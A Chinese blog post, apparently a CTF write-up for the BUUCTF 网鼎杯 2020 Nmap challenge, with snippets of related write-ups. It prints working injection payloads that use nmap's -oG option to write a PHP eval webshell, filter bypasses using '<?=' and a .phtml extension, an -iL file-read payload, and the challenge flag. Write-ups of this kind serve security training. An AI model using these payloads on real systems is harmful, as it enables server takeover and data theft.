web buuctf [网鼎杯 2020 朱雀组]Nmap1

最新推荐文章于 2024-09-10 23:07:37 发布
最新推荐文章于 2024-09-10 23:07:37 发布
阅读量1.7k 收藏
点赞数
文章标签: nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123970176
版权
"本文介绍了如何通过NAMP注入技巧,利用<?=和phtml绕过PHP过滤,成功上传恶意脚本并获取flag。详细步骤包括构造payload、绕过过滤和最终获取flag {fb8e3637-ac42-456c-8caf-d1470e670fe5}
摘要由CSDN通过智能技术生成

考点:namp注入

参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客

1.

 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件

我们直接用那道buu里的payload:

' <?php eval($_POST["cmd"]);?> -oG zhuque.php '

注入之后发现存在过滤,fuzz,过滤了php

(1)利用<?=来代替<?php进行绕过
(2)利用phtml来代替shell.php的文件后缀

payload:

' <?= eval($_POST["cmd"]);?> -oG zhuque.phtml '

 上传成功

3.打开蚁剑

 在根目录下找到flag

 flag{fb8e3637-ac42-456c-8caf-d1470e670fe5}

半杯雨水敬过客
关注
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2491
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 781
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 725
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
[网鼎杯 2020 朱雀]Nmap 历程记录
最新发布
m0_74196038的博客
09-10 402
我一开始的时候只试了flag.php,没有成功,后面就放弃了,忘了试一试flag.txt,但事实就是这道题有更简单的做法,所以说在解题的时候还是要把基础的打点要做好,后面再返工是很难受的。查了一下资料,nmap里面有 一个 -iL 参数,后面可以跟上文件名,表示扫描目标是文件里的所有地址,但是我看了好多师傅的poc,也试了几个都不行,不知道咋回事。扫描自己,发现没啥有用的信息,他这里每扫一个主机会把扫描信息存在一个新的文件里,简单试了一下传的参数,也没发现sql注入。查看源码,给了个提示flag路径。
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3989
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
[网鼎杯 2020 朱雀]Nmap
pakho_C的博客
07-27 1585
nmap192.168.0.*--exclude192.168.0.100使用“-exclude”选项来排除某些你不想要扫描的主机。nmap-F192.168.0.101快速扫描,仅扫描nmap-services文件中的端口而避开所有其它的端口。nmap-O127.0.0.1使用选项“-O”和“-osscan-guess”也帮助探测操作系统信息。nmap-p80,443192.168.0.101使用“-P”选项指定你想要扫描的端口。...
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3073
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
WebMap:WebMap-Nmap Web 仪表板和报告
05-30
Nmap XML 报告的 Web 仪表板 目录 截屏 用法 您应该将它与 docker 一起使用,只需发送以下命令: $ mkdir /tmp/webmap $ docker run -d \ --name webmap \ -h webmap \ -p 8000:8000 \ -v /tmp/webmap:/opt/...
BUUCTF: [网鼎杯 2020 朱雀]Nmap
末初的CSDN博客
09-21 2025
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
[网鼎杯 2020 朱雀]Nmap1
kw741951的博客
08-06 223
看到这里我们猜测,输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果。输入发现报错,但是没事,继续输入haha'得到flag。我们试着输入127.0.0.1 \| ls试一下。随便输入本地ip试一下127.0.0.1。输入127.0.0.1 | ls看一下。可以看到输入的|被转义字符\转义了。我们输入的东西必须绕过这两个函数。看样子是nmap扫描了。打开题目看到如下信息。
buuctf-Nmap
m0_62094846的博客
04-07 2776
输入127.0.0.1出现界面,再根据题目的nmap知道是命令执行 输入127.0.0.1 | ls |被转义了,查一下可以用什么代替 分号也被转义了 %0a没被转义,但是也没用(我之前也觉得没有用,就是尝试一下) 那就很难用命令执行了 看看能不能输入一句话木马 127.0.0.1 | ' <?php @eval($_POST['value']);?> -oG hack.php ' 筛查后发现是php被过滤了,修改一下 127.0.0....
BUUCTF WEB NMAP
qq_41696858的博客
12-28 391
经典回显关了的NMAP,和之前做过的一台hack the box靶机里面的某一台比较像 那么就是合理利用 -oN的问题了,直接输出flag就可以,但是你一定要连shell也无所谓,多一步连接工作罢了 127.0.0.1 正常回显,-iL代表查找目标主机中的相关文件 下面就是尝试它如何过滤的 直接输出到flag payload:127.0.0.1' -iL /flag -oN flag ' 怎么说呢,我们在127.0.0.1 | ls的时候他把我们的|转义了,那么肯定是有过滤机制的 其中这两个单引号是用来绕过
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值